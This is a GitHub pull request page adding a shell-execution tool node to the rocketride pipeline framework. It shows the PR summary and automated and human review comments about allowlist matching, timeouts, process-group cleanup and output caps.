Skip to content

feat: add shell tool#739

Open
AditM99 wants to merge 4 commits intorocketride-org:developfrom
AditM99:feat/RR-653-shell
Open

feat: add shell tool#739
AditM99 wants to merge 4 commits intorocketride-org:developfrom
AditM99:feat/RR-653-shell

Conversation

@AditM99
Copy link
Copy Markdown

@AditM99 AditM99 commented May 1, 2026

Summary

-Executes shell commands in the host environment. Use to run scripts, manage processes, install packages, and interact with the operating system via the command line

Type

Feature

Testing

Tests added or updated
Tested locally
./builder test passes

Checklist

  • Commit messages follow conventional commits
  • No secrets or credentials included
  • Wiki updated (if applicable)
  • Breaking changes documented (if applicable)

Linked Issue

Fixes #653

Summary by CodeRabbit

  • New Features

    • Added a Shell tool to run host commands with per-call cwd, env, timeout, and structured results (stdout, stderr, exit_code, timed_out, truncated).
    • Enforced command allowlist matching (full-command regex); startup validates allowlist and can refuse to start if misconfigured.
    • Output truncation and timeout behavior documented and surfaced in results (including exit_code mappings for timeouts and shell-launch failure).
  • Documentation

    • New user guide covering inputs/outputs, configuration, examples, and security guidance.
  • Tests

    • Comprehensive tests for config parsing, execution, truncation, timeouts, env merging, and error mappings.

@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai Bot commented May 1, 2026

Note

Reviews paused

It looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the reviews.auto_review.auto_pause_after_reviewed_commits setting.

Use the following commands to manage reviews:

  • @coderabbitai resume to resume automatic reviews.
  • @coderabbitai review to trigger a single review.

Use the checkboxes below for quick actions:

  • ▶️ Resume reviews
  • 🔍 Trigger review
📝 Walkthrough

Walkthrough

Adds a new Shell tool node: config parsing, global lifecycle state, a tool instance exposing execute with allowlist/env/timeout handling, a subprocess executor with truncation and timeout logic, service registration, documentation, and unit tests.

Changes

Shell tool node

Layer / File(s) Summary
Config parsing / defaults
nodes/src/nodes/tool_shell/config_parser.py
Defines DEFAULT/MAX bounds and parsing helpers: working dir, timeout, max output, env-vars -> dict, commandAllowlist -> list[re.Pattern], with JSON-coercion and invalid-pattern callback.
Global state / lifecycle
nodes/src/nodes/tool_shell/IGlobal.py
Adds IGlobal with fields (working_dir, timeout, max_output_bytes, env_vars, allow_external_env, command_patterns) and beginGlobal()/endGlobal() to load/clear node config; records invalid-pattern warnings and raises if allowlist configured but no valid patterns.
Execution core
nodes/src/nodes/tool_shell/shell_executor.py
Implements execute_command() to spawn shell subprocesses, drain stdout/stderr concurrently with per-stream caps and truncation marker, kill process tree on timeout (returns exit_code=-1), maps FileNotFoundError to exit_code=127; adds build_environment() for layered env precedence.
Instance wiring / tool API
nodes/src/nodes/tool_shell/IInstance.py
Adds IInstance with @tool_function execute(args) that validates input, enforces allowlist via re.fullmatch, resolves cwd/timeout, builds merged env, calls execute_command, and returns structured result (stdout, stderr, exit_code, timed_out, truncated).
Service registration & package exports
nodes/src/nodes/tool_shell/services.json, nodes/src/nodes/tool_shell/__init__.py
Registers tool_shell:// service and configurable fields (workingDir, timeout, maxOutputBytes, allowExternalEnv, envVars, commandAllowlist); package __init__ re-exports IGlobal and IInstance.
Documentation
nodes/src/nodes/tool_shell/README.md
New README documenting shell.execute inputs, outputs, configuration, allowlist semantics, and security guidance.
Tests
nodes/test/tool_shell/test_config_parser.py, nodes/test/tool_shell/test_shell_executor.py, nodes/test/tool_shell/__init__.py
Unit tests for parsers (coercion, clamping, JSON handling, invalid patterns) and executor (stdout/stderr capture, exit codes, timeouts, cwd, env precedence, truncation), plus module docstring.

Sequence Diagram

sequenceDiagram
    participant Agent as Agent/Caller
    participant IInst as IInstance
    participant Global as IGlobal
    participant Exec as shell_executor
    participant Sub as Subprocess

    Agent->>IInst: execute({command, working_dir?, env?, timeout?})
    IInst->>IInst: validate input, enforce allowlist
    IInst->>Global: read defaults (cwd, timeout, max_output, env, allow_external)
    IInst->>IInst: resolve cwd and timeout
    IInst->>Exec: build_environment(base_env=None, config_env, call_env, allow_external_env)
    Exec-->>IInst: merged_env
    IInst->>Exec: execute_command(command, cwd, env, timeout, max_output_bytes)
    Exec->>Sub: spawn subprocess (shell=True, cwd, env)
    Sub-->>Exec: stdout, stderr, returncode (or timeout)
    Exec-->>IInst: {stdout, stderr, exit_code, timed_out, truncated}
    IInst-->>Agent: response dict
Loading

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~60 minutes

Possibly related PRs

Suggested reviewers

  • jmaionchi
  • stepmikhaylov
  • Rod-Christensen

Poem

🐰 I hopped to the shell with a curious nose,
Patterns fenced the commands where the wild input goes,
Timeouts stand ready, outputs trimmed neat,
Env layers settle where processes meet,
Tests nibble edges — the rabbit hops upbeat.

🚥 Pre-merge checks | ✅ 5
✅ Passed checks (5 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title 'feat: add shell tool' is concise, clear, and accurately describes the main change—introducing a new Shell tool node.
Linked Issues check ✅ Passed The PR fully implements all coding requirements from issue #653: executes commands in host shell, returns stdout/stderr, supports working directory configuration, and supports per-execution environment variable injection.
Out of Scope Changes check ✅ Passed All changes are directly related to implementing the Shell tool node as specified in issue #653; no extraneous or unrelated modifications are present.
Docstring Coverage ✅ Passed Docstring coverage is 100.00% which is sufficient. The required threshold is 80.00%.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@github-actions github-actions Bot added docs Documentation module:nodes Python pipeline nodes labels May 1, 2026
@github-actions
Copy link
Copy Markdown

github-actions Bot commented May 1, 2026

No description provided.

Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 8

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@nodes/src/nodes/tool_shell/config_parser.py`:
- Around line 79-83: The code currently coerces env values with
str(row.get('envValue') or ''), which turns valid falsy values like 0 or False
into empty strings; change the assignment to preserve falsy but non-None values
by first checking for None and only defaulting to '' in that case (e.g. value =
row.get('envValue'); env[name] = '' if value is None else str(value)). Update
the block that builds the env dict (the variables name and env) to use this
None-aware conversion so 0/False remain "0"/"False" instead of ''.

In `@nodes/src/nodes/tool_shell/IInstance.py`:
- Around line 126-127: The default node-level working_dir
(self.IGlobal.working_dir) is not being validated like per-call override paths;
update the logic to run the same validation routine used for override values on
self.IGlobal.working_dir before returning it (and raise the same error/exception
used for invalid overrides), and apply the identical change to the other
occurrence around lines 133-135 so both the override branch and the default
branch use the same validation path-checking code (reference: the variables
override and self.IGlobal.working_dir).

In `@nodes/src/nodes/tool_shell/services.json`:
- Around line 51-52: The description for maxOutputBytes is inaccurate: the
executor enforces a per-stream cap rather than a combined stdout+stderr limit.
Update the description of maxOutputBytes to state that it is the maximum size
applied to each of stdout and stderr individually (e.g., "Maximum size per
stream (stdout and stderr); each is truncated beyond this limit. Default 1
MiB."), or alternatively change the executor logic (where output truncation is
implemented) to combine stdout and stderr before enforcing the 1048576
limit—ensure the symbol maxOutputBytes and the executor's truncation behavior
remain consistent.

In `@nodes/src/nodes/tool_shell/shell_executor.py`:
- Around line 55-63: The subprocess.run call that uses capture_output=True must
be replaced with a streaming implementation that enforces max_output_bytes while
data is produced so memory can't grow unbounded: use subprocess.Popen([...],
shell=True, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
and read stdout/stderr in chunks (select/poll or threads) feeding each chunk
into the existing _decode_and_cap routine (or an incremental variant) to
accumulate decoded output up to max_output_bytes, and if the cap is reached
terminate the child (proc.kill()) and stop reading; preserve timeout by waiting
with proc.wait(timeout) and ensure completed.returncode, stdout/stderr, and
timeout behavior match the original contract. Apply the same change to the other
run site referenced (the block around lines 81-90) and keep using the completed
variable and _decode_and_cap to integrate with existing logic.

In `@nodes/test/tool_shell/test_config_parser.py`:
- Around line 99-113: Add a regression test ensuring falsy envValue values are
coerced to their string representations rather than an empty string: add a new
test (e.g., test_preserves_falsy_values) that calls parse_env_vars with cfg
containing envVars entries like {'envName': 'ZERO', 'envValue': 0} and
{'envName': 'FLAG', 'envValue': False} (also include a JSON-encoded variant if
desired) and assert the result equals {'ZERO': '0', 'FLAG': 'False'} so
parse_env_vars preserves and stringifies falsy values.

In `@nodes/test/tool_shell/test_shell_executor.py`:
- Around line 166-175: The test currently assumes a fixed sentinel 'PATH'
exists; make it robust by selecting the sentinel key from the live environment:
import os in the test and set sentinel = next(iter(os.environ.keys()), 'PATH')
(or similar) before calling build_environment so the assertion checks a key that
actually exists in the test process; keep the reference to the test helper
build_environment and replace the hard-coded 'PATH' sentinel with the dynamic
sentinel variable.
- Around line 17-19: Replace the sys.path.insert workaround with an
importlib-based module load to avoid mutating global import state: locate the
shell_executor.py file (the module that defines build_environment and
execute_command) using Path(__file__).resolve().parent.parent.parent / 'src' /
'nodes' / 'tool_shell', create a spec via importlib.util.spec_from_file_location
and load the module via importlib.util.module_from_spec/exec_module, then access
build_environment and execute_command from that loaded module instead of
importing via sys.path manipulation; update any references to the imported names
accordingly.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: d9bf715a-a5ce-4be7-bfd0-92b1b06e5d34

📥 Commits

Reviewing files that changed from the base of the PR and between a665f46 and 5871dd7.

📒 Files selected for processing (10)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/README.md
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment thread nodes/src/nodes/tool_shell/config_parser.py
Comment thread nodes/src/nodes/tool_shell/IGlobal.py
Comment thread nodes/src/nodes/tool_shell/IInstance.py Outdated
Comment thread nodes/src/nodes/tool_shell/services.json Outdated
Comment thread nodes/src/nodes/tool_shell/shell_executor.py Outdated
Comment thread nodes/test/tool_shell/test_config_parser.py
Comment on lines +17 to +19
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / 'src' / 'nodes' / 'tool_shell'))

from shell_executor import build_environment, execute_command # noqa: E402
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🧹 Nitpick | 🔵 Trivial

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "Top-level module names in nodes/src/nodes/tool_shell:"
fd -a -e py . nodes/src/nodes/tool_shell | xargs -I{} basename {} .py | sort -u

echo
echo "Potential conflicting imports in test files:"
rg -nP --type=py -C2 '^\s*(import|from)\s+(shell_executor|config_parser)\b' -g 'nodes/test/**'

Repository: rocketride-org/rocketride-server

Length of output: 1091


🏁 Script executed:

head -40 nodes/src/nodes/tool_shell/shell_executor.py

Repository: rocketride-org/rocketride-server

Length of output: 1616


🏁 Script executed:

head -40 nodes/src/nodes/tool_shell/__init__.py

Repository: rocketride-org/rocketride-server

Length of output: 1443


🏁 Script executed:

rg -A5 -B5 'without triggering' nodes/test/tool_shell/

Repository: rocketride-org/rocketride-server

Length of output: 1820


Consider using importlib.util for cleaner module loading.

Lines 17–19 use sys.path.insert() to avoid triggering the __init__.py import (which requires engine runtime). While this is an intentional workaround with clear documentation, importlib.util.spec_from_file_location() achieves the same isolation more cleanly without modifying the global import path. This improves test determinism and follows Python testing best practices.

Suggested refactor
+import importlib.util
 import os
 import sys
 from pathlib import Path

-# Add the node source directory to sys.path so we can import the module
-# without triggering the top-level nodes/__init__.py (which requires the
-# engine runtime).
-sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / 'src' / 'nodes' / 'tool_shell'))
-
-from shell_executor import build_environment, execute_command  # noqa: E402
+_SHELL_EXECUTOR_PATH = (
+    Path(__file__).resolve().parent.parent.parent
+    / 'src'
+    / 'nodes'
+    / 'tool_shell'
+    / 'shell_executor.py'
+)
+_SPEC = importlib.util.spec_from_file_location(
+    'tool_shell_shell_executor',
+    _SHELL_EXECUTOR_PATH,
+)
+assert _SPEC is not None and _SPEC.loader is not None
+_MODULE = importlib.util.module_from_spec(_SPEC)
+_SPEC.loader.exec_module(_MODULE)
+
+build_environment = _MODULE.build_environment
+execute_command = _MODULE.execute_command
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@nodes/test/tool_shell/test_shell_executor.py` around lines 17 - 19, Replace
the sys.path.insert workaround with an importlib-based module load to avoid
mutating global import state: locate the shell_executor.py file (the module that
defines build_environment and execute_command) using
Path(__file__).resolve().parent.parent.parent / 'src' / 'nodes' / 'tool_shell',
create a spec via importlib.util.spec_from_file_location and load the module via
importlib.util.module_from_spec/exec_module, then access build_environment and
execute_command from that loaded module instead of importing via sys.path
manipulation; update any references to the imported names accordingly.

Comment thread nodes/test/tool_shell/test_shell_executor.py Outdated
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 3

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@nodes/src/nodes/tool_shell/IInstance.py`:
- Around line 122-126: The allowlist check in _validate_command currently uses
regex search (self.IGlobal.command_patterns) which permits allowed fragments
inside longer/chained commands; update _validate_command to require full-string
matches by replacing p.search(command) with p.fullmatch(command) when checking
patterns, keeping the same behavior of raising ValueError('Command is not
permitted by the configured allowlist.') if no patterns fully match the command.

In `@nodes/src/nodes/tool_shell/services.json`:
- Around line 56-60: Change the insecure default for environment injection by
setting "tool_shell.allowExternalEnv" default to false and require an explicit
command allowlist to enable it; update the corresponding allowlist configuration
(the tool_shell allowlist/allowed-commands setting referenced around lines
92-101) so it is empty/absent by default and fail-safe (reject execution if no
allowlist is provided), and update any production profile
templates/documentation/tests to require an explicit non-empty allowlist before
enabling allowExternalEnv.

In `@nodes/src/nodes/tool_shell/shell_executor.py`:
- Around line 58-65: The subprocess is started with shell=True so proc.kill()
only kills the shell, leaving background children (and t_out/t_err reader
threads) alive; modify the process creation in shell_executor.py (the proc
setup) to create a new process group: on POSIX set preexec_fn=os.setsid, and on
Windows add creationflags=subprocess.CREATE_NEW_PROCESS_GROUP; then change the
timeout cleanup logic that currently calls proc.kill() to kill the entire group
(use os.killpg(proc.pid, signal.SIGKILL) on POSIX and
proc.send_signal(signal.CTRL_BREAK_EVENT) or appropriate group termination on
Windows) so background children are terminated and t_out/t_err readers can
finish.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 64bcc2db-012e-4a05-b356-8ee4f8ce36b6

📥 Commits

Reviewing files that changed from the base of the PR and between 5871dd7 and 64dbe38.

📒 Files selected for processing (9)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment thread nodes/src/nodes/tool_shell/IInstance.py
Comment thread nodes/src/nodes/tool_shell/services.json Outdated
Comment thread nodes/src/nodes/tool_shell/shell_executor.py Outdated
Copy link
Copy Markdown
Collaborator

@Rod-Christensen Rod-Christensen left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I can definitely see why we would want this, and I can also see how incredibly dangerous it is... I'd like to get your thoughts on how we could lock this down a bit more?

Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@nodes/src/nodes/tool_shell/IGlobal.py`:
- Around line 82-85: The current guard only raises if there are compile errors
(invalid_pattern_errors) but misses the case where a configured allowlist
(commandAllowlist) yields no usable patterns because entries were blank; update
the check after parse_command_patterns so that if the config indicates an
allowlist was provided (e.g., cfg.commandAllowlist / presence of any
commandPattern entries) but compiled_patterns is empty, raise the ValueError
instead of allowing an empty list; modify the logic around
parse_command_patterns, invalid_pattern_errors and compiled_patterns in IGlobal
(the block that currently sets self.command_patterns) to treat "configured but
produced no usable patterns" as a failure case so IInstance._validate_command
cannot short-circuit and allow all commands.

In `@nodes/src/nodes/tool_shell/README.md`:
- Line 53: Update the README description for the exit_code handling to broaden
the meaning of 127: change the current line that says "`127` indicates the host
shell could not be launched" to something like "`127` indicates either a command
was not found or the host shell could not be launched, depending on context" so
readers understand both common POSIX uses; target the `exit_code` documentation
entry in nodes/src/nodes/tool_shell/README.md and update the sentence that
references `127`.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 11160dbc-2053-4cac-90b3-3efd418affa7

📥 Commits

Reviewing files that changed from the base of the PR and between 1b7eafe and 859e9a2.

📒 Files selected for processing (10)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py
  • nodes/src/nodes/tool_shell/README.md
  • nodes/src/nodes/tool_shell/__init__.py
  • nodes/src/nodes/tool_shell/config_parser.py
  • nodes/src/nodes/tool_shell/services.json
  • nodes/src/nodes/tool_shell/shell_executor.py
  • nodes/test/tool_shell/__init__.py
  • nodes/test/tool_shell/test_config_parser.py
  • nodes/test/tool_shell/test_shell_executor.py

Comment on lines +82 to +85
compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
if invalid_pattern_errors and not compiled_patterns:
raise ValueError(f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}')
self.command_patterns = compiled_patterns
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major | ⚡ Quick win

Allowlist still fails open when configured with only blank patterns.

The fail-closed guard only triggers when at least one pattern produces a compile error (invalid_pattern_errors). However, parse_command_patterns silently skips blank/whitespace commandPattern entries without calling on_invalid, so a config like:

{"commandAllowlist": [{"commandPattern": ""}, {"commandPattern": "   "}]}

ends with compiled_patterns == [] and invalid_pattern_errors == []. No ValueError is raised, and IInstance._validate_command then short-circuits on the empty list and admits every command — exactly the silent-allow-all outcome this check is meant to prevent.

Tighten the guard to fire whenever an allowlist was configured but produced no usable patterns.

💡 Proposed fix
-        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
-        if invalid_pattern_errors and not compiled_patterns:
-            raise ValueError(f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}')
-        self.command_patterns = compiled_patterns
+        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
+        raw_allowlist = cfg.get('commandAllowlist')
+        if raw_allowlist and not compiled_patterns:
+            first = invalid_pattern_errors[0] if invalid_pattern_errors else 'all entries were blank or invalid'
+            raise ValueError(
+                'commandAllowlist is configured but no usable patterns were compiled; '
+                f'refusing to start with a non-functional allowlist (would silently allow all commands). Detail: {first}'
+            )
+        self.command_patterns = compiled_patterns
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@nodes/src/nodes/tool_shell/IGlobal.py` around lines 82 - 85, The current
guard only raises if there are compile errors (invalid_pattern_errors) but
misses the case where a configured allowlist (commandAllowlist) yields no usable
patterns because entries were blank; update the check after
parse_command_patterns so that if the config indicates an allowlist was provided
(e.g., cfg.commandAllowlist / presence of any commandPattern entries) but
compiled_patterns is empty, raise the ValueError instead of allowing an empty
list; modify the logic around parse_command_patterns, invalid_pattern_errors and
compiled_patterns in IGlobal (the block that currently sets
self.command_patterns) to treat "configured but produced no usable patterns" as
a failure case so IInstance._validate_command cannot short-circuit and allow all
commands.

}
```

`exit_code` is the process return code. `-1` indicates the command was killed due to timeout; `127` indicates the host shell could not be launched.
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify typical shell semantics for exit code 127 without repository access.
set -euo pipefail

# 1) Command-not-found path (usually returns 127 from /bin/sh)
if command -v sh >/dev/null 2>&1; then
  sh -c 'definitely_not_a_real_command_12345' >/tmp/rr_out 2>/tmp/rr_err || true
  echo "sh command-not-found exit code: $?"
fi

# 2) Launch failure path (simulate missing shell binary)
python - <<'PY'
import subprocess
try:
    subprocess.run(["/definitely/missing/shell", "-c", "echo hi"], check=False)
except FileNotFoundError:
    print("launch failure produces FileNotFoundError before process exit code")
PY

Repository: rocketride-org/rocketride-server

Length of output: 177


🏁 Script executed:

cat -n nodes/src/nodes/tool_shell/README.md | sed -n '45,60p'

Repository: rocketride-org/rocketride-server

Length of output: 1166


🏁 Script executed:

#!/bin/bash
# Corrected verification: capture exit code BEFORE || operator
set -euo pipefail

# 1) Correct way to check command-not-found exit code
sh -c 'definitely_not_a_real_command_12345' 2>/dev/null || exit_code=$?
echo "sh command-not-found exit code: ${exit_code:-0}"

# 2) Verify on bash as well
bash -c 'definitely_not_a_real_command_12345' 2>/dev/null || exit_code=$?
echo "bash command-not-found exit code: ${exit_code:-0}"

Repository: rocketride-org/rocketride-server

Length of output: 150


Broaden exit_code=127 explanation to include command-not-found.

Line 53 states that 127 indicates the host shell could not be launched, but in standard POSIX shells, 127 is also (and more commonly) returned when a command is not found. The documentation should cover both cases to prevent troubleshooting confusion. Suggest: "127 indicates either a command was not found or the host shell could not be launched, depending on context."

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@nodes/src/nodes/tool_shell/README.md` at line 53, Update the README
description for the exit_code handling to broaden the meaning of 127: change the
current line that says "`127` indicates the host shell could not be launched" to
something like "`127` indicates either a command was not found or the host shell
could not be launched, depending on context" so readers understand both common
POSIX uses; target the `exit_code` documentation entry in
nodes/src/nodes/tool_shell/README.md and update the sentence that references
`127`.

Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai Bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 1

♻️ Duplicate comments (1)
nodes/src/nodes/tool_shell/IGlobal.py (1)

82-87: ⚠️ Potential issue | 🟠 Major | ⚡ Quick win

Allowlist still fails open when configured entries are all blank/whitespace.

The guard only fires when invalid_pattern_errors is non‑empty. As parse_command_patterns silently skips blank/whitespace commandPattern entries (it does not call on_invalid for them), a config like {"commandAllowlist": [{"commandPattern": ""}, {"commandPattern": " "}]} produces compiled_patterns == [] and invalid_pattern_errors == []. No ValueError is raised, and IInstance._validate_command then short‑circuits on the empty list (if patterns and ...), admitting every command — the exact silent‑allow‑all outcome this guard was added to prevent.

Tighten the predicate to "allowlist was configured but nothing usable was compiled", independent of whether errors were captured.

💡 Proposed fix
-        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
-        if invalid_pattern_errors and not compiled_patterns:
-            raise ValueError(
-                f'commandAllowlist is configured but every pattern failed to compile; refusing to start with a non-functional allowlist (would silently allow all commands). First error: {invalid_pattern_errors[0]}'
-            )
-        self.command_patterns = compiled_patterns
+        compiled_patterns = parse_command_patterns(cfg, on_invalid=_on_invalid_pattern)
+        raw_allowlist = cfg.get('commandAllowlist')
+        if raw_allowlist and not compiled_patterns:
+            first = invalid_pattern_errors[0] if invalid_pattern_errors else 'all entries were blank or invalid'
+            raise ValueError(
+                'commandAllowlist is configured but no usable patterns were compiled; '
+                f'refusing to start with a non-functional allowlist (would silently allow all commands). Detail: {first}'
+            )
+        self.command_patterns = compiled_patterns
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@nodes/src/nodes/tool_shell/IGlobal.py` around lines 82 - 87, The current
guard only raises when invalid_pattern_errors is non-empty, letting a
configured-but-empty (blank/whitespace-only) commandAllowlist slip through;
change the predicate so we raise whenever the allowlist was provided in the
config but no usable patterns were compiled: after calling
parse_command_patterns(cfg, ...), check for the presence of the allowlist config
(e.g. cfg contains "commandAllowlist" or similar) and if compiled_patterns is
empty, raise the ValueError regardless of invalid_pattern_errors; update the
block around compiled_patterns / invalid_pattern_errors (the code handling
parse_command_patterns and self.command_patterns) to implement this tighter
check so blank/whitespace-only entries don’t silently fail open.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@nodes/src/nodes/tool_shell/IInstance.py`:
- Around line 87-94: The description in the description=lambda of IInstance
currently advertises "max {MAX_TIMEOUT}s" which is incorrect because
_resolve_timeout clamps per-call overrides to self.IGlobal.timeout, not
MAX_TIMEOUT; update the description string to remove the MAX_TIMEOUT
parenthetical and instead state the configured global timeout (e.g., "Timeout:
{self.IGlobal.timeout}s (configured global timeout)") so the text matches the
actual behavior of _resolve_timeout and IGlobal.timeout; alternatively, if you
prefer the other approach, change _resolve_timeout to clamp to MAX_TIMEOUT
instead of self.IGlobal.timeout, but do not leave the mismatch between the
description lambda, _resolve_timeout, IGlobal.timeout, and MAX_TIMEOUT.

---

Duplicate comments:
In `@nodes/src/nodes/tool_shell/IGlobal.py`:
- Around line 82-87: The current guard only raises when invalid_pattern_errors
is non-empty, letting a configured-but-empty (blank/whitespace-only)
commandAllowlist slip through; change the predicate so we raise whenever the
allowlist was provided in the config but no usable patterns were compiled: after
calling parse_command_patterns(cfg, ...), check for the presence of the
allowlist config (e.g. cfg contains "commandAllowlist" or similar) and if
compiled_patterns is empty, raise the ValueError regardless of
invalid_pattern_errors; update the block around compiled_patterns /
invalid_pattern_errors (the code handling parse_command_patterns and
self.command_patterns) to implement this tighter check so blank/whitespace-only
entries don’t silently fail open.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: ASSERTIVE

Plan: Pro

Run ID: 9a07c17e-1a52-4077-931c-483b309f39d1

📥 Commits

Reviewing files that changed from the base of the PR and between 859e9a2 and e9f8311.

📒 Files selected for processing (2)
  • nodes/src/nodes/tool_shell/IGlobal.py
  • nodes/src/nodes/tool_shell/IInstance.py

Comment on lines +87 to +94
description=lambda self: (
'Execute a shell command on the host and return stdout, stderr, and exit code. '
'Use for build scripts (npm/pip/make), package management, file operations, process management, '
'environment inspection, and host-installed git operations. '
f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). '
f'Default working directory: {self.IGlobal.working_dir or "host process CWD"}. '
'For portable git operations that do not depend on the host having git installed, prefer the Git node.'
),
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Tool description overstates the per‑call timeout ceiling.

_resolve_timeout clamps the per‑call override to self.IGlobal.timeout (line 168), not to MAX_TIMEOUT. The description string f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). ' advertises MAX_TIMEOUT as the ceiling, which is what an LLM consumer will use when constructing tool calls. Requests with a timeout between IGlobal.timeout and MAX_TIMEOUT will be silently clamped down, contradicting the description.

Either drop the MAX_TIMEOUT mention from the per‑call description (since it’s really the configurable upper bound, not the per‑call ceiling), or change the clamp to MAX_TIMEOUT.

💡 Proposed fix (description-only)
-            f'Timeout: {self.IGlobal.timeout}s (max {MAX_TIMEOUT}s). '
+            f'Timeout: {self.IGlobal.timeout}s (per-call cap, also the maximum). '
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@nodes/src/nodes/tool_shell/IInstance.py` around lines 87 - 94, The
description in the description=lambda of IInstance currently advertises "max
{MAX_TIMEOUT}s" which is incorrect because _resolve_timeout clamps per-call
overrides to self.IGlobal.timeout, not MAX_TIMEOUT; update the description
string to remove the MAX_TIMEOUT parenthetical and instead state the configured
global timeout (e.g., "Timeout: {self.IGlobal.timeout}s (configured global
timeout)") so the text matches the actual behavior of _resolve_timeout and
IGlobal.timeout; alternatively, if you prefer the other approach, change
_resolve_timeout to clamp to MAX_TIMEOUT instead of self.IGlobal.timeout, but do
not leave the mismatch between the description lambda, _resolve_timeout,
IGlobal.timeout, and MAX_TIMEOUT.

@stepmikhaylov
Copy link
